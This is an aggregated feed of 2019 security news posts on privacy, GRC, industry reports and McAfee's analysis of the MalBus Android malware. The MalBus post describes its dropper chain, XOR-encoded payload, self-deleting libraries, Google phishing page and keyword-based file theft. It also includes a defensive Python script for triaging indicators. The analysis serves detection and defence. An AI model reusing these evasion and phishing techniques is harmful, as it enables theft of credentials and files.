U.S. government agencies and businesses are largely unprepared for a major cyber attack from state-sponsored actors, and must prepare now, according to a report by key governmental-focused think tanks.

The post Government, Private Sector Unprepared for 21st Century Cyber Warfare appeared first on The Security Ledger.

How today’s workforce stays secure and what apps it prefers

User-focused security apps KnowBe4, LastPass, and Proofpoint dominate the list of fastest growing apps within enterprises, according to Okta. “KnowBe4 in particular is fulfilling a clear market need: less than half of survey respondents have ever participated in cybersecurity training at work,” the company noted in its latest Businesses @ Work report, which is based on data collected between November 1, 2017 to October 31, 2018 from its Okta Integration Network. Most popular apps Microsoft … More

The post How today’s workforce stays secure and what apps it prefers appeared first on Help Net Security.

How much does your credit card issuer know about you?

Cash is slowly but steadily becoming one of the least popular payment methods in developed countries. Here in the US, the volume of consumer purchases made with plastic cards is roughly ten times that of cash payments. Consumers are giving up on checks and cash handling and opting in to the convenience, protection, and rewards often offered by the issuing banks.

Very often credit card companies attract clients by offering comprehensive reward points systems, sign-up bonuses, and perks such as early access to concert tickets and invitations to special events organized for clients of a particular network – Visa, MasterCard, American Express, or Discover. Credit cards let cardholders purchase goods and services on the strength of the cardholder’s promise to pay back the borrowed amounts along with additional charges such as interest and monthly service fees.

Credit card issuers are in possession of all sorts of personal information that includes current and previous addresses, income, full name, and DOB. There is no harm there; it’s normal for businesses to ask for personal information so they can verify your identity and determine your trustworthiness. However, personal information is not the only valuable thing that credit card holders are giving away when they start a relationship with a credit card company.

While issuing banks are known to profit from the fees associated with credit card use, consumers are also giving up vast amounts of personal information that may be used by the credit card companies and may end up shared with third parties. Such information includes your spending habits, shopping patterns, preferences, life secrets, and in some cases even your location.

What information do you give to credit card issuers and how do credit card companies keep track of your buying habits?

Location

If you use mobile banking, the chances are high that your credit card issuer knows your location at all times. The information collected could be used for both marketing and security purposes. If you tend to spend a lot of money on dining, you might be offered a new credit card that gives you even more rewards for money spent on a night out. Sharing your location with your issuer helps banks fight fraud too: your issuer would not be concerned to see an international transaction if you travel a lot.

Spending habits and patterns

Credit card issuers can learn a lot about you from your spending habits and patterns. If you end up spending a lot of money on international trips they might use the information to suggest travel cards with no foreign transaction fees. Or guide you to an affiliated travel website so you can spend more using the same card. Yearly, monthly, and weekly patterns show banks what your day looks like and gives them an idea of what products and services you may need.

Trustworthiness

Card issuers use your transaction history to decide whether you are trustworthy and reliable. You may qualify for a credit limit increase if your debt-to-income ratio is acceptable, all your payments are on time, and you pay a regular monthly fee to a luxury car maker. Banks love people who pay their bills on time! It won’t be a surprise if you are offered better credit card conditions as your credit score grows over the years. Banks may even disregard a poor credit score if you are a long-term client and they see a pattern they like: you are considered a valued customer as long as you use their card and pay your bills on time.

How do they use the data?

In the age of big data, your card transaction history says a lot about who you are and how you live your life. So it is no surprise that many organizations want access to such data. Life insurance companies might give more favorable quotes to people who go to the gym four times a week, spend no money on tobacco or liquor, and buy organic. So you can imagine that, apart from providing you with solutions that suit your lifestyle, card issuers often partner with data mining companies whose goal is to make you spend more money.

Banks also share transactional data with third parties such as data brokers, who work with advertisers and marketers always ready to target you with what they believe are relevant campaigns for goods and services you may be willing to purchase. If you do not want your data analyzed, you can opt out for Visa cards here and for MasterCard cards here. Opt-out requests last only five years, so to maintain your opt-out choice you have to manually enter the card details of every new or replacement card you receive.

Is this enough to be secure and to prevent your data from being spread around?

Not really. The best way to know what data you are sharing with your credit card issuer is to read the terms and conditions you are given at sign-up. Having antivirus software installed on all your connected devices also helps: staying protected keeps cybercriminals from collecting, from your own device, the piece of information about you that the constant data leaks of the last decade have not already given them.

The post How much does your credit card issuer know about you? appeared first on Panda Security Mediacenter.

What do successful pentesting attacks have in common?

In external penetration testing undertaken for corporate clients in industrial, financial, and transport verticals in 2018, Positive Technologies found that, at the vast majority of companies, there were multiple vectors in which an attacker could reach the internal network. Full control of infrastructure was obtained on all tested systems in internal pentesting. In addition, the testers obtained access to critical resources such as ICS equipment, SWIFT transfers, and ATM management. These statistics are based on … More

The post What do successful pentesting attacks have in common? appeared first on Help Net Security.

Lookalike domains: Artificial intelligence may come to the rescue

In the world of network security, hackers often use lookalike domains to trick users to unintended and unwanted web sites, to deliver malicious software into or to send data out of victim’s network, taking advantage of the fact that it’s hard to tell the difference between those domains and the targets they look alike. For example, in a recent card skimming malware attack, domain google-analyitics.org was used to receive collected payment card data (there is … More

The post Lookalike domains: Artificial intelligence may come to the rescue appeared first on Help Net Security.

5 reasons why asset management is a hot topic in 2019

Sometimes buzzwords are good predictors of what organizations see as priorities in a given year. If you surveyed both the revenue-generating and security functions of enterprises in 2019, you would hear two terms often repeated: digital transformation and zero trust. While the two terms may seem at linguistic odds, the idea that organizations must embrace the digital age to drive growth and operate more efficiently while simultaneously maintaining adequate information security makes sense. It won’t … More

The post 5 reasons why asset management is a hot topic in 2019 appeared first on Help Net Security.

The impact of cyber-enabled economic warfare escalation

The results of a tabletop exercise on cyber-enabled economic warfare find that when a large-scale destructive cyberattack occurs, the United States and the private sector must already have in place the resources and methods to share information in order to mitigate the attack and recover from it quickly, according to a joint report by the Foundation for Defense of Democracies (FDD) and The Chertoff Group. The exercise, which featured former senior government officials and private … More

The post The impact of cyber-enabled economic warfare escalation appeared first on Help Net Security.

70 real-life hackers and cybersecurity practitioners share their personal insights

Entering the information security industry can be a formidable undertaking and renowned professionals often seem larger than life and unapproachable (even though most are on Twitter and their email address is public). Luckily for us all, Marcus J. Carey and Jennifer Jin have the ear of some of the biggest names in the field and have decided to generously share that access. Their book Tribe of Hackers: Cybersecurity Advice from the Best Hackers in the … More

The post 70 real-life hackers and cybersecurity practitioners share their personal insights appeared first on Help Net Security.

Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety

Integration: it seems to be all the rage. As technology becomes more sophisticated, we sprint to incorporate these new innovations into our everyday lives. But as we celebrate Safer Internet Day, one can’t help but wonder, is all integration good when it comes to information shared online? Major privacy concerns have been raised surrounding Facebook’s recent plans to merge Messenger, WhatsApp, and Instagram. This integration will allow cross-messaging between the three platforms (which will all still operate as standalone apps), so users could talk to their Messenger-only friends without leaving WhatsApp.

While Facebook’s plans to merge the messaging platforms are not yet finalized, the company is in the process of rebuilding the underlying infrastructure so that users who might utilize only one of the apps will be able to communicate with others within the company’s ecosystem. Facebook plans to include end-to-end encryption for the apps, ensuring that only the participants of a conversation can view the messages being sent. By allowing each app to speak to one another across platforms, Facebook hopes users become more engaged and use this as their primary messaging service.

But Facebook’s messaging changes have greater implications for online safety as consumers become more protective of their data. For example, WhatsApp only requires a phone number to sign up for the app while Facebook asks users to verify their identities. Will this force more data to be shared with WhatsApp, or will its encryption become less secure? While nothing has been finalized, it’s important for users to think about how the information they share online could be affected by this merge.

Although the internet has paved the way for advancements in social media and technology in general, users need to make sure they’re aware of the potential risks involved. And while this merge hasn’t happened yet, Safer Internet Day helps remind us to make good choices when it comes to browsing online. Following these tips can help keep you and your data safe and secure:

  • Get selective about what you share. Although social media is a great way to keep your friends and family in the loop on your daily life, be conservative about the information you put on the internet. Additionally, be cautious of what you send through messaging platforms, especially when it comes to your personally identifiable information.
  • Update your privacy settings. To make sure that you’re sharing your status with just your intended audience, check your privacy settings. Choose which apps you wish to share your location with and turn your profiles to private if you don’t want all users to have access to your information.
  • Keep your apps up-to-date. Keeping your social media apps updated can prevent exposure to threats brought on by software bugs. Turn on automatic updates so you always have the latest security patches, and make sure that your security software is set to run regular scans.
  • Click with caution. Cybercriminals can leverage social media messaging to spread phishing links. Don’t interact with users or messages that seem suspicious and keep your guard up by blocking unfamiliar users who try to send you sketchy content.
  • Stay secure while you browse online. Security solutions like McAfee WebAdvisor can help block malware and phishing sites if you accidentally click on a malicious link. This can help protect you from potential threats when you access your social channels from a desktop or laptop.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety appeared first on McAfee Blogs.

Why vaporworms might be the scourge of 2019

Not too long ago, the WatchGuard Threat Lab predicted the emergence of vaporworms as a major new cyber threat that will affect organizations of all sizes in 2019. We coined the term to describe a new breed of fileless malware with self-propagating, wormlike properties. At the time of the initial prediction, our team was fairly sure this idea was more than conjecture, but now the advent of the vaporworm in 2019 seems to be an … More

The post Why vaporworms might be the scourge of 2019 appeared first on Help Net Security.

AI won’t solve all of our cybersecurity problems

AI is already supporting businesses with tasks ranging from determining marketing strategies, to driverless cars, to providing personalized film and music recommendations. And its use is expected to grow even further in the coming years. In fact, IDC found that spending on cognitive and AI systems will reach $77.6 billion in 2022, more than three times the $24.0 billion forecast for 2018. But the question remains – can businesses expect AI adoption to effectively protect … More

The post AI won’t solve all of our cybersecurity problems appeared first on Help Net Security.

Cybersecurity Documentation: The Best Defense Is a Good Offense

Most people do not regard their cybersecurity and privacy documentation as a proactive security measure. On the contrary, many oftentimes view documentation as a passive effort that offers little protection to a company, generally an afterthought that must be addressed to appease compliance efforts. Where documentation may get some much-needed attention is through Ohio’s recent […]… Read More

The post Cybersecurity Documentation: The Best Defense Is a Good Offense appeared first on The State of Security.

MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development

McAfee’s Mobile Research team recently learned of a new malicious Android application masquerading as a plugin for a transportation application series developed by a South Korean developer. The series provides a range of information for each region of South Korea, such as bus stop locations, bus arrival times and so on. There are a total of four apps in the series, with three of them available from Google Play since 2013 and the other from around 2017. Currently, all four apps have been removed from Google Play while the fake plugin itself was never uploaded to the store. While analyzing the fake plugin, we were looking for initial downloaders and additional payloads – we discovered one specific version of each app in the series (uploaded at the same date) which was dropping malware onto the devices on which they were installed, explaining their removal from Google Play after 5 years of development.

Figure 1. Cached Google Play page of Daegu Bus application, one of the apps in series

When the malicious transportation app is installed, it downloads an additional payload from hacked web servers, which includes the fake plugin we originally acquired. Once the fake plugin is downloaded and installed, it does nothing a real plugin would do: it poses as a plugin for the transportation application but actually installs a trojan on the device, phishing users for their Google account password and taking complete control of the device. What is interesting is that the malware uses a native library to take over the device and then deletes that library to hide from detection. It uses the names of popular South Korean services such as Naver, KakaoTalk, Daum and SKT. According to our telemetry data, the number of infected devices was quite low, suggesting that the final payload was installed on only a small group of targets.

The Campaign

The following diagram explains the overall flow from malware distribution to device infection.

Figure 2. Device infection process

When the malicious version of the transportation app is installed, it checks whether the fake plugin is already installed and, if not, downloads from the server and installs it. After that, it downloads and executes an additional native trojan binary which is similar to the trojan which is dropped by the fake plugin. After everything is done, it connects with the C2 servers and handles received commands.

Initial Downloader

The following table shows information about the malicious version of each transportation app in the series. As the Google Play install counts show, these apps have been downloaded on many devices.

Unlike the clean version of the app, the malicious version contains a native library named “libAudio3.0.so”.

Figure 3. Transportation app version with malicious native library embedded

In the BaseMainActivity class of the app, it loads the malicious library and calls startUpdate() and updateApplication().

Figure 4. Malicious library being loaded and executed in the app

startUpdate() checks whether the app is correctly installed by checking for the existence of a specific flag file named “background.png” and whether the fake plugin is installed already. If the device is not already infected, the fake plugin is downloaded from a hacked web server and installed after displaying a toast message to the victim. updateApplication() downloads a native binary from the same hacked server and dynamically loads it. The downloaded file (saved as libSound1.1.so) is then deleted after being loaded into memory and, finally, it executes an exported function which acts as a trojan. As previously explained, this file is similar to the file dropped by the fake plugin which is discussed later in this post.

Figure 5. Additional payload download servers

Fake Plugin

The fake plugin is downloaded from a hacked web server with the file extension “.mov” to look like a media file. When it is installed and executed, it displays a toast message saying the plugin was successfully installed (in Korean) and calls a native function named playMovie(). The icon for the fake plugin soon disappears from the screen. The native function, implemented in LibMovie.so, which is stored inside the asset folder, drops a malicious trojan into the currently running app’s directory masquerading as a libpng.2.1.so file. The dropped trojan is embedded in LibMovie.so XOR-encoded and is decoded at runtime. After setting permissions, the address of the exported function “Libfunc” in the dropped trojan is dynamically retrieved using dlsym(). The dropped binary is then deleted from the filesystem to avoid detection and, finally, Libfunc is executed.

Figure 6. Toast message when malware is installed
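The two static indicators this section describes, an APK served under a media extension and an APK bundling one of the campaign’s native library names, lend themselves to a simple triage check. The following is an added example written for this write-up, not McAfee’s tooling; the library names come from the analysis above, and the archives it inspects are constructed in memory for the demonstration.

```python
"""Static triage helper for the MalBus indicators described in the analysis.

Added example, not McAfee's tooling. It checks two things the write-up calls
out: (1) a file served with a media extension such as ".mov" that is really
an APK (a ZIP archive carrying AndroidManifest.xml and classes.dex), and
(2) an APK bundling one of the native library names the campaign used.
"""
import io
import os
import zipfile

# Native library names quoted in the analysis. They are assumed here to be
# distinctive enough for triage; they are not a substitute for file hashes.
SUSPICIOUS_NATIVE_LIBS = {
    "libAudio3.0.so",   # embedded in the trojanised transportation apps
    "libSound1.1.so",   # downloaded payload, loaded into memory then deleted
    "LibMovie.so",      # shipped in the fake plugin's assets folder
    "libpng.2.1.so",    # trojan dropped into the running app's directory
}

MEDIA_EXTENSIONS = {".mov", ".mp4", ".mp3", ".avi", ".jpg", ".png"}
ZIP_MAGIC = b"PK\x03\x04"  # local file header of the first ZIP entry


def _zip_members(data: bytes):
    """Return the member names of a ZIP archive, or None if it is not one."""
    if not data.startswith(ZIP_MAGIC):
        return None
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return zf.namelist()
    except zipfile.BadZipFile:
        return None


def looks_like_apk(data: bytes) -> bool:
    """True if the bytes are a ZIP carrying the two mandatory APK members."""
    members = _zip_members(data)
    if members is None:
        return False
    names = set(members)
    return "AndroidManifest.xml" in names and "classes.dex" in names


def suspicious_libs_in_apk(data: bytes) -> list:
    """Return the indicator library names found anywhere in the archive."""
    members = _zip_members(data) or []
    found = {os.path.basename(m) for m in members} & SUSPICIOUS_NATIVE_LIBS
    return sorted(found)


def triage_download(filename: str, data: bytes) -> dict:
    """Classify a downloaded file by its extension versus its real content."""
    ext = os.path.splitext(filename)[1].lower()
    is_apk = looks_like_apk(data)
    libs = suspicious_libs_in_apk(data)
    # An APK served under a media extension is the fake-plugin delivery pattern.
    masquerading = is_apk and ext in MEDIA_EXTENSIONS
    return {
        "filename": filename,
        "is_apk": is_apk,
        "masquerading_as_media": masquerading,
        "suspicious_libs": libs,
        "verdict": "suspicious" if (libs or masquerading) else "clean",
    }


def build_sample_apk(extra_members) -> bytes:
    """Constructed in-memory APK-shaped ZIP used only for the demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<binary xml placeholder>")
        zf.writestr("classes.dex", b"dex\n035\x00")
        for name in extra_members:
            zf.writestr(name, b"\x7fELF placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed samples: a fake plugin delivered as ".mov", a trojanised
    # app carrying libAudio3.0.so, and a genuine-looking QuickTime header.
    print(triage_download("plugin.mov", build_sample_apk(["assets/LibMovie.so"])))
    print(triage_download("bus.apk", build_sample_apk(["lib/armeabi-v7a/libAudio3.0.so"])))
    print(triage_download("trailer.mov", b"\x00\x00\x00\x18ftypqt  " + b"\x00" * 32))
```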

In the other forked process, it tries to access the “naver.property” file on an installed SD card, if there is one, and if it succeeds, it tries to start the “.KaKaoTalk” activity, which displays a Google phishing page (more on that in the next section). The overall flow of the dropper is explained in the following diagram:

Figure 7. Execution flow of the dropper

Following is a snippet of a manifest file showing that “.KaKaoTalk” activity is exported.

Figure 8. Android Manifest defining “.KaKaoTalk” activity as exported

Phishing in JavaScript

The KakaoTalk class opens a local HTML file, javapage.html, with the email address registered on the infected device pre-filled so that the user appears to be logging into their own account.

Figure 9. KakaoTalk class loads malicious local html file

The victim’s email address is set to the local page through a JavaScript function setEmailAddress after the page is finished loading. A fake Korean Google login website is displayed:

Figure 10. The malicious JavaScript shows crafted Google login page with user account

We found the following attempts by the malware author to abuse legitimate Google services:

  • Steal victim’s Google account and password
  • Request password recovery for a specific account
  • Set recovery email address when creating new Google account

An interesting element of the phishing attack is that the malware authors tried to set their own email as the recovery address on Google’s legitimate services. For example, when a user clicks on the new Google account creation link in the phishing page, the crafted link is opened with the malware author’s email address as a parameter of RecoveryEmailAddress.

Figure 11. The crafted JavaScript attempts to set recovery email address for new Google account creation.

Fortunately for end users, none of the above malicious attempts are successful. The parameter with the malware author’s email address is simply ignored at the account creation stage.

Trojan

In addition to the Google phishing page, when the “Libfunc” function of the trojan (dropped by the fake plugin or downloaded from the server) is executed, the mobile phone is totally compromised. It receives commands from the following hardcoded list of C2 servers. The main functionality of the trojan is implemented in a function called “doMainProc()”. Please note that there are a few variants of the trojan with different functionality but, overall, they are pretty much the same.

Figure 12. Hardcoded list of C2 servers

The geolocation of the hardcoded C2 servers looks like the following:

Figure 13. Location of C2 Servers

Inside doMainProc(), the trojan receives commands from the C2 server and calls appropriate handlers. Part of the switch block below gives us an idea of what type of commands this trojan supports.

Figure 14. Subset of command handlers implemented in the dropped trojan.

As you can see, it has all the functionality that a normal trojan has: downloading, uploading and deleting files on the device, leaking information to a remote server and so on. The following table explains the supported C2 commands:

Figure 15. C2 Commands

Before entering the command handling loop, the trojan does some initialization, like sending device information files to the server and checking the UID of the device. Only after the UID checking returns a 1 does it enter the loop.

Figure 16. Servers connected before entering command loop

Among these commands, directory indexing in particular is important. The directory structure is saved in a file named “kakao.property” and, while indexing the given path on the user’s device, the trojan checks each file against specific keywords and, if one matches, uploads the file to the remote upload server. These keywords are Korean, and their English translations are given in the following table:

Figure 17. Search file keywords

By looking at the keywords we can anticipate that the malware authors were looking for files related to the military, politics and so on. These files are uploaded to a separate server.

Figure 18. Keyword matching file upload server

Conclusion

Applications can easily trick users into installing them and then leak sensitive information. Also, it is not uncommon to see malware sneaking onto the official Google Play store, making it hard for users to protect their devices. This malware has not been written for ordinary phishing attempts, but rather for very targeted attacks, searching the victim’s devices for files related to the military and politics, likely trying to leak confidential information. Users should only install applications that they can fully trust, even when they are downloaded from trusted sources.

McAfee Mobile Security detects this threat as Android/MalBus and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com.

Hashes (SHA-256)


The post MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development appeared first on McAfee Blogs.

Microsoft Secure: Announcing the new Security Engineering website

To meet users’ expectations for security when using a product or cloud service, security must be an integral part of all aspects of the lifecycle. We all know this, and yet time has proven that this is far easier said than done because there is no single approach nor silver bullet that works in every situation. However, Microsoft’s long commitment to security has demonstrated that there are a number of security practices that have survived the passage of time and, when applied flexibly in harmony with many approaches, will improve the security of products or cloud services.

We are sharing the results of our experiences through our new Security Engineering website, which includes updated Microsoft Security Development Lifecycle (SDL) practices that focus on development teams and what we believe to be the basic minimum steps for addressing security concerns when using open source. Additionally, we’ve included more specific Operational Security Assurance (OSA) practices, aligned with the operational lifecycle of cloud services, and we touch on how these can be brought together to deliver Secure DevOps.

There are four main sections to the new site:

Security Development Lifecycle (SDL)

The new Security Development Lifecycle (SDL) site offers updated practices that should be used during the development process to build more secure software by reducing the number and severity of vulnerabilities accidentally introduced into software. The practices cover a broad range of topics, from training and threat modeling, to managing the security risk of using third-party components, and security testing.

Operational Security Assurance (OSA)

The Operational Security Assurance (OSA) section outlines aligned practices to apply during the operational lifecycle of cloud services, making them more resilient to attack from real and potential cybersecurity threats. These include elements such as using Multi-Factor Authentication (MFA), protecting secrets, protecting against DDoS attacks, and penetration testing.

Secure DevOps

The Secure DevOps model provides a great foundation to improve security. SDL and OSA practices aligned with automation, monitoring, collaboration, and fast and early feedback provide a great opportunity to improve security. Practices outlined here include tooling and automation and continuous learning and monitoring.

Open Source Security

The Open Source Security section outlines the minimum steps necessary to begin to address security concerns when using open source components. Here the practices cover topics such as inventorying open source, updating components, and aligning security response processes, and the section aligns with the SDL practice of managing the security risk of using third-party components.

Throughout the site you will find useful references and resources to help. There are even consulting services offerings if you need them. See our Security documentation, where many of these resources can be found along with other useful security research papers, guides, and references. We hope you find the new Security Engineering site useful and encourage you to explore and share with your development and operations teams.

The post Announcing the new Security Engineering website appeared first on Microsoft Secure.




Four differences between the GDPR and the CCPA

By passing the California Consumer Privacy Act (CCPA), which goes into effect on January 1, 2020, the Golden State is taking a major step in the protection of consumer data. The new law gives consumers insight into and control of their personal information collected online. This follows a growing number of privacy concerns around corporate access to and sales of personal information with leading tech companies like Facebook and Google. The bill was signed by … More

The post Four differences between the GDPR and the CCPA appeared first on Help Net Security.

CISOs: Change your mindset or lose your job

Capgemini commissioned IDC to produce a new piece of research, which reveals the increasing pressure on the Chief Information Security Officer to drive forward digital transformation – or risk losing their seat at the table when it comes to key business decisions. Whilst CISOs are now involved in 90% of significant business decisions, the research found that just 25% of business executives perceive CISOs as proactively enabling digital transformation – which is a key goal … More

The post CISOs: Change your mindset or lose your job appeared first on Help Net Security.

Evaluating the biggest cyber threats to the electric power sector

The network of power plants and lines connecting to homes and businesses is widely considered to be among the most critical infrastructure in the world. It’s also one of the most frequently attacked, with consequences that could potentially reach far beyond the power sector. A new Deloitte Global report, “Managing cyber risk in the electric power sector,” evaluates the biggest cyberthreats to the electric power sector and suggests how companies can manage these risks. The … More

The post Evaluating the biggest cyber threats to the electric power sector appeared first on Help Net Security.

Email authentication use growing steadily in every industry sector

U.S. federal government agencies and many major enterprises have made significant strides to thwart the spread of fake emails, a major cybersecurity attack vector. But many organizations remain susceptible because they’re still not using readily available open standards-based technologies that prevent these fakes from reaching end-user inboxes. Valimail’s “Email Fraud Landscape, Q4 2018” indicates that the fight against fake email is advancing around the world — but email fraud remains a widespread and pernicious problem. … More

The post Email authentication use growing steadily in every industry sector appeared first on Help Net Security.

Can Enterprises execute a GRC Movement?

Of managed security services or security operations, cloud security and GRC, GRC is one of the fastest growing solutions in the world.

The only place I can say more risk = more gain would be in the entrepreneurship space…because in the enterprise cyber security kingdom, it is just the opposite! So let me explain…

Before I start, some facts: global IT spend according to Gartner is 3.7 Trillion in 2018, and the cyber security market is 150 Billion, which makes cyber security 4% of the total IT industry, growing at 10% CAGR. Of all the various solutions under cyber security, like Identity & Access, Application security, Network security, Managed security services or security operations and cloud security, GRC is one of the fastest growing solutions in the world.
Ref: https://www.gartner.com/en/information-technology/insights/cybersecurity
Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

Figure: GRC within the global cyber security market

Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

The need of the hour in the organization is to identify and mitigate risks that will seriously prohibit the growth of the business. Any business is run with a governance framework and various industry regulatory compliance requirements. Any issue in corporate governance or compliance leads to an increase in risk…hence a platform is required whose purpose is to reduce the risk in the organization. A GRC automation platform or an Integrated Risk Management solution serves the purpose!

Just food for thought…even bad code can function…but it will be disastrous! Hence it’s imperative to have a well thought out coding governance structure for creating good coding practice…similarly, in the corporate governance environment, GRC programs create a good structure and are critical for managing your cybersecurity risk…even though manual processes seem to be working efficiently!

Governance, Risk and Compliance (GRC) is about managing your enterprise data effectively, but with data come its security and privacy concerns too. So why not think of outsourcing or transferring the risk?…well, not a good idea! Enterprises can outsource cyber security, but not risk. Risk will always be within your organization. Hence you need to contain your risk…by continuously monitoring your enterprise data. So now the challenge is in managing your in-house data! (yes, data, the buzzword…”whoever controls the data controls the world!”)

To securely house the data we need to identify which is the most critical information or PII (personally identifiable information) to be protected, or what policy needs to be crafted that will ensure compliance with the various controls applied to the identified risks! The GDPR law, for example, has shown comprehensive checks and deterrents to protect EU citizen data. One thing to remember is that these data protection laws are not about protecting data but ultimately about people! (remember Article 17, ‘right to be forgotten’, in GDPR)

Also, with digital transformation and internet proliferation, cyber fraud and crime will only increase, which means the threat to people and their privacy will always increase!

So where do we start?

The starting point is always the internal policies or external regulations that guard the organizational boundaries or, in social life, human rights! These policies are the key to governance, or to the success of the entire GRC program in an organization. Policies define the boundaries, which act as the perimeter defence that needs to be continuously monitored. Policies not only help govern a nation but also govern an enterprise.

Once an appropriate policy is created, we need to ensure that implementation of the policy is managed and any non-compliance with these policies is tracked to closure according to the risk appetite. This standardization could be achieved through a platform called GRC!

But there are many challenges in GRC adoption…even after more than a decade of GRC presence, I still hear incoherent objections from clients.

The 3 major objections are as follows:

  1. Why shift to automation when the current manual process is efficient enough?
  2. We only want Audit Management Automation, so why invest in an Integrated Risk Management or GRC solution?
  3. Internal teams’ use of the GRC features in day-to-day activities is very low, which means the adoption by the internal risk or compliance team itself is low. So how do we change this behaviour? (I faced this with one of the world’s biggest stock exchanges)

The challenge is the adoption rate of the GRC platform…many think it’s an added cost and hence continue with the manual process…only to create more risk in their organization, which keeps piling up!

To add to this, with various automation products and document management platforms available, the GRC purpose is lost a bit among the chaos…

Hence I feel it’s time to create a larger awareness campaign for GRC… I call it ‘The GRC Movement’

If you look at all the world’s biggest historical events (be it the Martin Luther King, Jr. Civil Rights movement, Mahatma Gandhi’s Satyagraha or non-cooperation movement, or the invention of the printing press), they were primarily triggered by a mass movement. Every global movement had a common goal to achieve…this collective purpose is missing in the GRC space today.

Image: GRC movement (Source: AFP/Getty Images / Pic Courtesy: Wikimedia Commons / https://www.pinterest.com/pin/803048177275425019/)

Why are social movements important in the world? Because the collective actions of a social movement play an important role in bringing social change, and because there was a need for the movement, since a common message was not articulated or there was a lack of direction. Similarly, there is a need to create a GRC movement in enterprises. This movement will bring about a risk culture change which will ensure every process in the enterprise is standardized and optimized. This would ultimately be demonstrated by a reduction in the count of risks in the organization.

I feel we can create a GRC movement in 3 simple ways:

Organizations need a better approach to tackle cybersecurity and risk! I propose an approach of having a 360 degree view to make a GRC movement happen.

This 360 degree GRC movement can be achieved using the three aspects that follow:

GRC for Enterprise (Contextual)

Are the applications or use cases of GRC platforms or products for enterprises going to be different for different organisations? If yes, then what kind of use cases? They might not be different, but they would be architected, developed or configured differently.

Example: every traffic signal has 3 alert lights globally, but the traffic model in India is different from the US, Australia or Europe (parameters like traffic density, road width, peak time etc. are all different for the various economies), and similarly autonomous driving in China and Germany might be different…

When a new technology or workflow is developed…you need to renegotiate the policy…because there is no single right way of doing it but multiple wrong ways of doing it.

Example: what if a new camera comes along which sees through walls? You would want to renegotiate your corporate privacy policy! It’s a continuous improvement cycle.

The true value of a GRC technology for the end users or stakeholders is in its user experience. The comfort with which users can create reports and dashboards or conduct a risk assessment would be the key for the enterprise. This would decide the adoption rate and consumption rate of the GRC solution among the enterprise users.

Innovation itself doesn’t hurt users…users are hurt because change happens and the user experience changes!

So what’s your ‘GRC for Enterprise’ vision?

GRC of Enterprise (Ownership)

The organization goes through complete chaos if the risk process is handled manually…hence if you digitise risk…then you have more control over your data, which leads to more visibility!

As the GRC platform of the enterprise matures, it becomes the protected property or IP of the organization…it’s too risky for any organization to handle the governance & compliance aspects or tasks manually…as even a single missed event or incident can bring the organization down financially. The enterprise needs to be alert 24×7, but the hackers need to get in just once! The risk or compliance team within the enterprise knows the genesis of every problem, and only they can solve it, using automation to reduce the effort and manual error for long-term gains.

Privacy and accountability of the data in the GRC tool is a critical aspect; hence compliance with various regulations like GDPR would be the key to a successful GRC journey! Without mapping the controls to the policy or corporate objective, to check which policy violation has happened, the core purpose of an integrated GRC platform will never be achieved! This mapping will lead to accountability in the organization!

All executives and senior leadership should have more knowledge of the regulations in their industry as all their actions are linked to the risk and compliance of their enterprise.

Simply training employees would not be enough, and hence it’s crucial to carry the process maturity and standardization achieved through the GRC platform forward consistently. Revisiting the various workflows, KPIs and metrics and fine-tuning them to suit the ever-changing cyber world is the key!

A GRC platform for an already established and mature organization would be different compared to one for a newly formed organization.

For this, GRC management would need to have a VC vs. PE mindset depending on the organizational maturity.

A venture capitalist would take a start-up and grow it exponentially…a PE firm will take an already established company and grow it multi-fold.

So what’s your ‘GRC of Enterprise’ vision?

GRC by Enterprise (Contribution)

How can enterprises contribute to the GRC field…how do we as an entire ecosystem develop GRC talent and skills in an enterprise…

Can a unique problem in the enterprise be solved by a unique workflow configured by that enterprise…which could then be a case study for the industry to learn from?

Has there been an increase in the adoption of the GRC platform for risk and compliance records after the enhancement of the user experience? The GRC group within the enterprise can contribute their learnings to the external world…

In the GRC space every organization hunts for the best practices implemented by other organizations, but this data is not publicly available, as many hesitate to share information. Hence I believe there is a need for a global social contract for our information security economy, just as climate change can be dealt with through policy changes globally. We also need to remember that no policy is written in stone, as evolution needs to happen! So a common database of best practices in GRC is the need of the hour!

The success of the GRC movement would lie in its adoption by all parties simultaneously. It’s in everyone’s interest to collaborate and share success stories with other enterprises, without which the GRC solution will soon be outdated! Let the world know your uniqueness and let others learn from your innovation. Let others build the platform further, which would be the true spirit of collaboration!

So what’s your ‘GRC by Enterprise’ vision?

Hence, for a successful GRC program an organization needs to have a GRC vision which comprises all 3 of the above dimensions.

This will create a GRC Democracy!

Note: Opinions expressed are solely my own and do not express the views or opinions of my employer.

Author: Deric Karunesudas is currently working with RSA (Cyber Security division of Dell) handling the presales for GRC Archer for SEA and SAARC Market. He is a Cybersecurity Evangelist and a GRC Architect.

Starting his consulting career with Deloitte, he is a seasoned Cyber security & Privacy professional with end-to-end experience of delivery, sales and presales. He has managed various markets like the US, Europe and the Middle East in his previous avatar.

His proposal paper on “Internet of Things” was selected for ISF Copenhagen World congress Nov 2014 and Atlanta World Congress 2015.

He is a technology enthusiast and has keen interest in Entrepreneurship. Deric believes in the power of Cloud, Blockchain & data-driven disruption!

Twitter – @thisisderic

Pierluigi Paganini

(SecurityAffairs – GRC, cybersecurity)

The post Can Enterprises execute a GRC Movement? appeared first on Security Affairs.

Security Affairs: Can Enterprises execute a GRC Movement?

Managed security services or security operations, cloud security, GRC is one of the fastest growing solutions in the world.

The only place I can say more risk = more gain would be in the entrepreneurship space…because in the enterprise cyber security kingdom, it is just the opposite! So let me explain…

